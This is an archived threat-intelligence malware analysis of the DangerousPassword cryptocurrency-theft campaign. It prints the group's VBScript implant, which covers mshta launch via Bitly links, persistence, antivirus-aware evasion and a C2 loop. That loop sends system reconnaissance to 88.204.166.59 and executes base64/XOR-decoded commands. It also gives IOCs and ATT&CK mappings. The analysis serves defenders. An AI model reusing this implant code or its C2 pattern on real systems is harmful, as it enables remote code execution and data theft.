{
	"id": "7fa75681-6904-439e-bf5a-ecb498bd234d",
	"created_at": "2026-04-06T00:20:09.383604Z",
	"updated_at": "2026-04-10T03:35:21.512263Z",
	"deleted_at": null,
	"sha1_hash": "2cb6d5d576800eb381e27f7e70561d381e543819",
	"title": "CyberThreatIntel/offshore APT organization/DangerousPassword/2020-04-02/Analysis.md at master · StrangerealIntel/CyberThreatIntel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 184679,
	"plain_text": "---\ntitle: Bitly\n---\nCyberThreatIntel/offshore APT organization/DangerousPassword/2020-04-02/Analysis.md at master · StrangerealIntel/CyberThreatIntel\nBy StrangerealIntel\nArchived: 2026-04-05 21:47:00 UTC\n\n# Dangerous Password\n\n## Table of Contents\n\n- Malware analysis\n- Cyber kill chain\n- Indicators Of Compromise (IOC)\n- References MITRE ATT&CK Matrix\n- Links\n  - Original Tweet\n  - Link Anyrun\n  - Articles\n\n## Malware analysis\n\nThe initial vector is an executable (self-extracting) RAR archive containing an edited LNK file. The LNK writes a file into the temp folder and executes remote code through an mshta call.\n\n| MachineID | IconFileName | CommandLineArguments | WorkingDirectory | LocalBasePath |\n|---|---|---|---|---|\n| desktop-mn3id9 | C:\\Windows\\System32\\shell32.dll | /c start /b %SystemRoot%\\System32\\mshta https[:]//bit.ly/2UiZH6V | C:\\Users\\Public\\Music\\ | C:\\Windows\\System32\\cmd.exe |\n\nThe Bitly link redirects to a fake cloud service that impersonates a legitimate one (.club instead of .fr).\n\n(Screenshot of the page served at http://www.cloudfiles.club:8080/edit?id=T8YJQTVktMp8W%2Bj/W5EvDWglxOnw8evApd1RaERyZzz/Qzh2uXI/O)\n\nThis page executes the following Visual Basic code. Its first two functions decode base64 and create a stream object to manipulate the data; only their tail survived extraction:\n\n```vb\n.Close\nend with\nend function\n```\n\nThe script then writes a file containing a password into the temp folder and opens it, as the lure shown to the victim:\n\n```vb\npay_req=\"CMD.EXE /C \"\"ECHO risk2020>\"\"%TEMP%\\Password.txt\"\"&NOTEPAD.EXE \"\"%TEMP%\\Password.txt\"\"&DEL \"\"%TEMP%\\P\nset wish=CreateObject(\"wscript.shell\")\nwish.Run pay_req,0,false\n```\n\nThe same variable is then reused to hold the base64-encoded payload that the new persistence file, launched by the LNK, will execute:\n\n```vb\npay_req=\"b24gZXJyb3IgcmVzdW1lIG5leHQNCnJhbmRvbWl6ZQ0KaWYgV1NjcmlwdC5Bcmd1bWVudHMuTGVuZ3RoPjAgdGhlbg0KCUhUUD0ia\n```\n\nThen it creates the persistence mentioned above, with the same TTP: an LNK file that calls mshta.\n\n```vb\nset fob=CreateObject(\"Scripting.FileSystemObject\")\npath_persistence=fob.GetSpecialFolder(2)&\"\\Xbox.lnk\"\nSet tcl=wish.CreateShortcut(path_persistence)\ntcl.TargetPath=\"mshta\"\ntcl.Arguments=\"https://bit.ly/3dr8YBv\"\npath_file=fob.GetSpecialFolder(2)&\"\\iilbat.vbs\"\nset btf=fob.OpenTextFile(path_file,2,true)\nbtf.Write dbsc(pay_req)\nbtf.Close()\n```\n\nThis part of the code queries the processes running on the PC through WMI and adapts its strategy according to the antivirus products it finds, to avoid detection. It then executes the next stage of the persistence.\n\n```vb\nlist_process=\"\"\nset wmi=GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")\nset wmiresult=wmi.ExecQuery(\"Select * from Win32_Process\")\nfor each obj in wmiresult\nlist_process=list_process&LCase(obj.Name)&\"|\"\nnext\n'npprot -> npprot.exe -> Net Protector (Indian AV)\n'kwsprot -> kwsprotect64.exe -> Kingsoft Antivirus (Chinese AV)\nex=\"ws\"\nif Instr(list_process,\"kwsprot\")>0 or Instr(list_process,\"npprot\")>0 then\nex=\"cs\"\nend if\nln=\"start /b \"&ex&\"cript \"\"\"&path_file&\"\"\" \"+\"88.204.166.59:8080/edit\"\nln2=\" & move \"\"\"&path_persistence&\"\"\" \"\"\"& wish.SpecialFolders(\"startup\") &\"\\\"\"\"\n'qhsafe -> QHSafeTray.exe -> Qihoo 360 Total Security (Chinese AV)\n'hudongf -> zhudongfangyu.exe -> Qihoo 360 security (Chinese AV)\nif Instr(list_process,\"hudongf\")>0 or Instr(list_process,\"qhsafe\")>0 then\nln2=\" & del \"\"\"&path_persistence&\"\"\"\"\nelse\ntcl.Save\nend if\nwish.run \"CMD.EXE /c \" & ln&\" 1\" & \" & \" & ln&\" 2\" & ln2,0,false\nwindow.close\n```\n\nOnce decoded and deobfuscated, we can see that the script checks whether an argument was passed before running, which is essential because the URL to contact is passed as that argument. It uses a random number to append a suffix of the form ?topic=sXXXXX to the URL; on the site, whatever the URL, the request is redirected to another piece of code to execute.\n\n```vb\non error resume next\nrandomize\nif WScript.Arguments.Length>0 then\nurl=\"http://\"&WScript.Arguments.Item(0)\nset whr=CreateObject(\"WinHttp.WinHttpRequest.5.1\")\ndo while true\nrtc=\"\"\ntpc=url&\"?topic=s\"&Int(1000*rnd+9000)\nwhr.Open \"POST\",tpc,false\nwhr.Send \"200\"\nif whr.Status=200 Then\nrtc=whr.ResponseText\nend if\nif rtc<>\"\" then\nExecute(rtc)\nexit do\nend if\nWScript.Sleep 180000 ' 50 min (sic: 180000 ms is 3 minutes)\nloop\nend if\n```\n\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md\nPage 2 of 9\n\nThe new Bitly link redirects to a new domain that impersonates the Microsoft update domain; this loads the Visual Basic code to execute into memory.\n\n(Screenshot of the page served at http://www.msupdatepms.xyz:8080/edit?id=WOR%2BQhmDavXldv2sjyh%2BT0j4LYqP0ZVKAenNEEfEwIjzActclow)\n\nThe first three functions of the code parse the code sent by the C2 for execution on the PC, decoding it with base64 and XOR.\n\n```vb\non error resume next\nfunction NStep(cmd)\nn=0\nt=0\nNStep=\"\" ' the value on this line and the lines that follow it up to the retry loop (including where uri is derived from cmd) were lost in extraction; \"\" and the loop header below are assumed\ndo while 1>0\nret=uget(uri)\nif ret=\"\" then\nif t=10 then\nexit function\nend if\nt=t+1\nelse\nexit do\nend if\nWScript.Sleep 60*1000\nloop\nn=InStr(1,ret,\"#\")\nk=CLng(\"&h\" & Mid(ret,1,n-1))\npsc=Mid(ret,n+1,Len(ret)-n)\nsc=bdec(psc)\npsc=CStr(xdec(sc,k))\nNStep=bdec(psc)\nend function\nfunction bdec(c)\non error resume next\nconst Base64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\ndim dataLength, sOut, groupBegin\nc = Replace(c, vbCrLf, \"\")\nc = Replace(c, vbTab, \"\")\nc = Replace(c, \" \", \"\")\ndataLength = Len(c)\nif dataLength Mod 4 <> 0 then\nexit function\nend if\nfor groupBegin = 1 to dataLength step 4\ndim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut\nnumDataBytes = 3\nnGroup = 0\nfor CharCounter = 0 to 3\nthisChar = Mid(c, groupBegin + CharCounter, 1)\nif thisChar = \"=\" then\nnumDataBytes = numDataBytes - 1\nthisData = 0\nelse\nthisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1\nend if\nif thisData = -1 then\nexit function\nend if\nnGroup = 64 * nGroup + thisData\nnext\nnGroup = Hex(nGroup)\nnGroup = String(6 - Len(nGroup), \"0\") & nGroup\npOut = Chr(CByte(\"&H\" & Mid(nGroup, 1, 2)))\npOut = pOut & Chr(CByte(\"&H\" & Mid(nGroup, 3, 2)))\npOut = pOut & Chr(CByte(\"&H\" & Mid(nGroup, 5, 2)))\nsOut = sOut & Left(pOut, numDataBytes)\nnext\nbdec = sOut\nend function\nfunction xdec(input, pkey)\nxdec=\"\"\nfor i=1 to Len(input)\nxdec=xdec+chr(asc(mid(input, i, 1)) Xor pkey)\nnext\nend function\n```\n\nThe next three functions use WMI queries to collect more information about the system.\n\n```vb\nfunction getUName()\ngetUName=\"\"\nset ObjWMI=GetObject(\"winmgmts:\\\\.\\root\\CIMV2\")\nset colItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_ComputerSystem\",,48)\nfor each objItem in colItems\nif not IsNull(objItem.UserName) then\ngetUName=objItem.UserName\nend if\nnext\nend function\nfunction getProc()\non error resume next\nset objWMIService = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")\nset prclst = objWMIService.ExecQuery (\"Select * from Win32_Process\")\nfor each prc in prclst\nif InStr(1,prc.Name,\"svchost\",1)=0 And prc.ProcessID <> 0 And prc.ProcessID <> 4 then\ngetProc=getProc+ent+CStr(prc.ProcessID)+tab+CStr(prc.SessionID)+tab\nif IsNull(prc.CommandLine) then\ngetProc=getProc+prc.Name\nelse\ngetProc=getProc+prc.CommandLine\nend if\nend if\nnext\nend function\nfunction getInfo()\non error resume next\nset ObjWMI=GetObject(\"winmgmts:\\\\.\\root\\CIMV2\")\nset osItems = ObjWMI.ExecQuery(\"Select * from Win32_OperatingSystem\")\nset wdate=CreateObject(\"WbemScripting.SWbemDateTime\")\nfor each item In osItems\non error resume next\ngetInfo=getInfo&\"Hostname:\"+tab+item.CSName+ent\ngetInfo=getInfo&\"OS Name:\"+tab+item.Caption+\" \"+item.OSArchitecture+ent\ngetInfo=getInfo&\"OS Version:\"+tab+item.Version+ent\nif not IsNull (item.InstallDate) then\nwdate.Value=item.InstallDate\ngetInfo=getInfo + \"Install Date:\"+tab+GetFormattedDate(wdate.GetVarDate(true))+ent\nend if\nif not IsNull(item.LastBootUpTime) then\nwdate.Value=item.LastBootUpTime\ngetInfo=getInfo + \"Boot Time:\"+tab+FormatDateTime(wdate.GetVarDate(true))+ent\nend if\nnext\nset csItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_ComputerSystem\")\nset tzItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_TimeZone\")\nfor each item in csItems\ncTZ=item.CurrentTimeZone\nnext\nfor each tzitem in tzItems\nUtcName=tzitem.StandardName\nnext\ntimezone =\"(UTC \" + CStr(cTZ/60) +\" hours) \" +UtcName\ngetInfo=getInfo+\"Time Zone:\"+tab+timezone+ent\nset cpuItems=ObjWMI.ExecQuery( \"SELECT * FROM Win32_Processor\")\nfor each item in cpuItems\nselect case item.Architecture\ncase 0 cpuArch=\"x86\"\ncase 6 cpuArch=\"Itanium\"\ncase 9 cpuArch=\"x64\"\ncase else\ncpuArch=\"Unknown\"\nend select\ngetInfo=getInfo+\"CPU:\"+tab+tab+item.Name+\" (\" + cpuArch + \")\"+ent\nnext\ngetInfo=getInfo + \"Path: \"+tab+WScript.ScriptFullName+ent+ent\nset adapItems=ObjWMI.ExecQuery(\"SELECT * FROM Win32_NetworkAdapterConfiguration\",,48)\nfor each adapter in adapItems\non error resume next\nif isNull(adapter.IPAddress) then\nelse\ngetInfo=getInfo+\"Network Adapter:\"+tab&adapter.Description+ent\ngetInfo=getInfo+\" MAC Address:\"+tab&adapter.MACAddress + ent\ngetInfo=getInfo+\" IP Address:\"+tab+Join(adapter.IPAddress, \",\") + ent\ngetInfo=getInfo+\" Subnet Mask:\"+tab+Join(adapter.IPSubnet, \",\") + ent\ngetInfo=getInfo+\" Default Gateway:\"+tab+Join(adapter.DefaultIPGateway, \",\") + ent\nif adapter.DHCPEnabled=true then\ngetInfo=getInfo+\" DHCP Servers:\"+tab&adapter.DHCPServer + ent\nend if\ngetInfo=getInfo+\" DNS Server:\"+tab+Join(adapter.DNSServerSearchOrder, \",\") + ent\nend if\nnext\nend function\n```\n\nThe next functions randomize the ID and the session, and format a date as a string.\n\n```vb\nfunction rand()\nrandomize\nrand=Int(90000000*rnd)+10000000\nend function\nfunction randID()\nrandomize\nrandID=Int(1000*rnd)\nend function\nfunction GetFormattedDate (sDate)\nstrDate = CDate(sDate)\nstrDay = DatePart(\"d\", strDate)\nstrMonth = DatePart(\"m\", strDate)\nstrYear = DatePart(\"yyyy\", strDate)\nif strDay < 10 then\nstrDay = \"0\" & strDay\nend if\nif strMonth < 10 then\nstrMonth = \"0\" & strMonth\nend if\nGetFormattedDate = strMonth & \"/\" & strDay &\"/\" &strYear\nend function\n```\n\nThe last functions send the collected information to the C2 and receive its reply.\n\n```vb\nfunction post(u,content)\non error resume next\nset hReq=CreateObject(\"MSXML2.XMLHTTP\")\nul=u & \"&isbn=\" & (timer()*100)\nhReq.Open \"POST\", ul, false\nhReq.Send content\nif hReq.Status=200 then\npost=hReq.responseText\nend if\nend function\nfunction uget(u)\non error resume next\nset hrq=CreateObject(\"MSXML2.XMLHTTP\")\nul=u & \"&id=\" & (timer()*100)\nhrq.Open \"GET\", ul, false\nhrq.Send\nif hrq.Status=200 then\nuget=hrq.responseText\nend if\nend function\n```\n\nThe main code launches the reconnaissance on the system and formats the information for the request to the C2, sent in clear. Depending on the C2 response, it executes commands on the system, either in clear or obfuscated with base64 plus substring operations.\n\n```vb\nset sh=CreateObject(\"wscript.Shell\")\nent=Chr(13)+Chr(10) '\\n\ntab=Chr(9) '\\t\nuID=CStr(rand())\nif WScript.Arguments.Length>1 then\nuID=uID&WScript.Arguments.Item(1)\nend if\nif WScript.Arguments.Length>0 then\nuu=\"http://\"&WScript.Arguments.Item(0)\nend if\nsData=getInfo()\nif IsNull(sData) then\nsData=\"\"\nend if\nsData=\"Username:\"+tab+getUName()+ent+sData\nsUri=\"\"\nurl=uu+\"?topic=v\"+CStr(randID())+\"&session=\"+uID\ndo while 1>0\npsc=\"\"\ncurDate = \"Current Time:\"&tab&Date&\" \"&Time\npl=getProc()\npData=curDate+ent+sData+ent\nif not IsNull(pl) then\npData=pData+pl\nend if\nres=post(url,pData)\nif InStr(1,res,\"20#\")<>0 then\npsc=NStep(res)\nif psc<>\"\" then\nExecute(psc)\nexit do\nend if\nelseif res=\"21\" then\nexit do\nelseif InStr(1,res,\"23#\")<>0 then\nnps=InStr(1,res,\"#\")\nExecute(bdec(Mid(res,nps+1,Len(res)-nps)))\nend if\nWScript.Sleep 60*1000\nloop\n```\n\nWe can list the codes used for the communication between the C2 and the implant (note: # is a wildcard in VBA that matches any digit character):\n\n| Code | Description |\n|---|---|\n| 20# | Execute commands in clear |\n| 21 | Exit session |\n| 22 | OK, information received (debug commands) |\n| 23# | Execute commands with base64 + substring operations as obfuscation |\n\nWe can see from the information sent in clear to the C2 that the list of collected information has stayed the same since mid-2019:\n\n```text\nCurrent Time: 3/31/2020 3:31:37 AM\nUsername: USER-PC\\admin\nHostname: USER-PC\nOS Name: Microsoft Windows 7 Professional 32-bit\nOS Version: 6.1.7601\nInstall Date: 10/05/2017\nBoot Time: 3/31/2020 12:28:48 AM\nTime Zone: (UTC 1 hours) GMT Standard Time\nCPU: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz (x64)\nPath: C:\\Users\\admin\\AppData\\Local\\Temp\\iilbat.vbs\nNetwork Adapter: Intel(R) PRO/1000 MT Network Connection\n MAC Address: [MAC]\n IP Address: 192.168.X.X,[MAC]\n Subnet Mask: 255.255.255.0,64\n Default Gateway: 192.168.X.X\n DNS Server: 192.168.X.X\n264 0 smss.exe\n344 0 csrss.exe\n380 0 wininit.exe\n388 1 csrss.exe\n428 1 winlogon.exe\n472 0 services.exe\n484 0 lsass.exe\n492 0 lsm.exe\n1188 0 spoolsv.exe\n1364 0 IMEDICTUPDATE.EXE\n1428 0 qemu-ga.exe\n1968 1 \"taskhost.exe\"\n1984 1 taskeng.exe {DE21909D-DEE6-419E-AF8D-D6899DCE61F7}\n2044 1 \"C:\\Windows\\system32\\Dwm.exe\"\n372 1 C:\\Windows\\Explorer.EXE\n652 1 C:\\Windows\\System32\\ctfmon.exe\n1120 0 SearchIndexer.exe\n1932 1 \"windanr.exe\"\n2736 1 \"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"C:\\Users\\admin\\AppData\\Local\\Temp\\3249e2eb1eaa628dcf7c83062463bc6b\n1720 1 \"C:\\Windows\\System32\\cmd.exe\" /C \"ECHO risk2020>C:\\Users\\admin\\AppData\\Local\\Temp\\Password.txt&NOTEPAD.E\n3020 1 \\??\\C:\\Windows\\system32\\conhost.exe \"1233334231726783925-1766655123-1154929739-1178529684175521206-10630\n680 1 NOTEPAD.EXE C:\\Users\\admin\\AppData\\Local\\Temp\\Password.txt\n588 0 WmiPrvSE.exe\n3292 1 wscript \"C:\\Users\\admin\\AppData\\Local\\Temp\\iilbat.vbs\" 88.204.166.59:8080/edit 1\n3284 1 wscript \"C:\\Users\\admin\\AppData\\Local\\Temp\\iilbat.vbs\" 88.204.166.59:8080/edit 2\n```\n\nAccording to the analysis of the Japanese CERT (June 2019), the list is the same:\n\n- Username\n- Hostname\n- OS version\n- OS install date\n- OS runtime\n- Timezone\n- CPU name\n- Execution path of the VBS file\n- Network adapter information\n- List of running processes\n\nOn the open directory, as in the previous observations of the group, legitimate VNC binaries can be found; this indicates that the group has kept the same TTPs for data extraction. It is highly probable that the group performs manual actions to reduce the security measures and then runs the tools to obtain the cryptocurrency data.\n\nChina doesn't recognize cryptocurrencies as legal tender, and since September 2017 the banking system has not accepted cryptocurrencies or provided services for trading them. The Chinese government has recently promoted a law facilitating the transition to a state-led virtual currency; this change explains why, since the January campaign, China is now the focus among the Asian countries targeted by the group (the announcement also caused an increase in bitcoin and its derivative currencies). The TTPs of the group have been the same since mid-2019 and remain focused on the theft of cryptocurrencies.\n\n## Cyber kill chain\n\nThis process graph represents the cyber kill chain used by the attacker.\n\n## Indicators Of Compromise (IOC)\n\nThe IOC can be exported in JSON and CSV.\n\n## References MITRE ATT&CK Matrix\n\n| Enterprise tactics | Techniques used | Ref URL |\n|---|---|---|\n| Execution | Command-Line Interface | https://attack.mitre.org/techniques/T1059/ |\n| Execution | Scripting | https://attack.mitre.org/techniques/T1064/ |\n| Execution | Mshta | https://attack.mitre.org/techniques/T1170/ |\n| Defense Evasion | Scripting | https://attack.mitre.org/techniques/T1064/ |\n| Defense Evasion | Install Root Certificate | https://attack.mitre.org/techniques/T1130/ |\n| Defense Evasion | Mshta | https://attack.mitre.org/techniques/T1170/ |\n| Discovery | Query Registry | https://attack.mitre.org/techniques/T1012/ |\n\nThis can be exported as JSON format: Export in JSON\n\n## Links\n\nOriginal tweet:\nhttps://twitter.com/Rmy_Reserve/status/1244817235211739141\n\nLinks Anyrun:\nhttps://app.any.run/tasks/67ebd848-26f8-4cb3-9a1f-8ff4f3a0c12e\n\nArticles:\n\n- Spear Phishing against Cryptocurrency Businesses\n- [Chinese] The Nightmare of Global Cryptocurrency Companies: Demystifying APT Group's \"Dangerous Passwords\"\n- China Enacts Crypto Law in Run-Up to State Digital Currency Debut\n\nSource: https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md"
	],
	"report_names": [
		"Analysis.md"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434809,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2cb6d5d576800eb381e27f7e70561d381e543819.pdf",
		"text": "https://archive.orkl.eu/2cb6d5d576800eb381e27f7e70561d381e543819.txt",
		"img": "https://archive.orkl.eu/2cb6d5d576800eb381e27f7e70561d381e543819.jpg"
	}
}